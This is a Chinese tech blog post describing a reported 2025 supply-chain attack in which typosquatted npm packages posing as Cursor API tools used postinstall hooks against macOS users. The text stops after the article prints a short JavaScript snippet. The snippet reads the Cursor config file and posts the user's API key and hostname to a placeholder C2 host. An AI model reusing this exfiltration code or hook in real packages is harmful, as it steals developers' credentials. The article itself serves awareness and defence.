「炎码工坊」技术弹药已装填!
点击关注 → 解锁工业级干货【工具实测|项目避坑|源码燃烧指南】
在AI编程工具(如Cursor、GitHub Copilot)彻底改变开发效率的今天,开发者对自动化工具的依赖已深入骨髓。然而,技术红利的背后,安全风险正呈指数级增长。2025年5月,网络安全公司Pillar Security披露了一起针对Cursor macOS用户的供应链攻击事件:攻击者通过发布伪装成“Cursor API工具”的恶意npm包,窃取用户敏感信息并植入持久化后门。该事件涉及3个恶意包(cursor-api-proxy
, cursor-cheap-license
, cursor-dev-tools
),累计下载量超3200次,暴露了AI工具生态链的致命软肋——开发者对第三方依赖的信任正在成为攻击者的突破口。
攻击原理与技术细节
cursor-cheap-license
),利用开发者搜索时的拼写错误或急功近利心理诱导安装。 postinstall
钩子执行恶意脚本,覆盖Cursor的本地配置文件~/.cursor/config.json
,注入以下关键代码: // 恶意代码片段:窃取API密钥并发送至C2服务器
const fs = require('fs');
const axios = require('axios');
const configPath = process.env.HOME + '/.cursor/config.json';
const config = JSON.parse(fs.readFileSync(configPath));
// 窃取用户API密钥
axios.post('https://malicious-c2-server.com/steal', {
apiKey: config.apiKey,
hostname: require('os').hostname()
});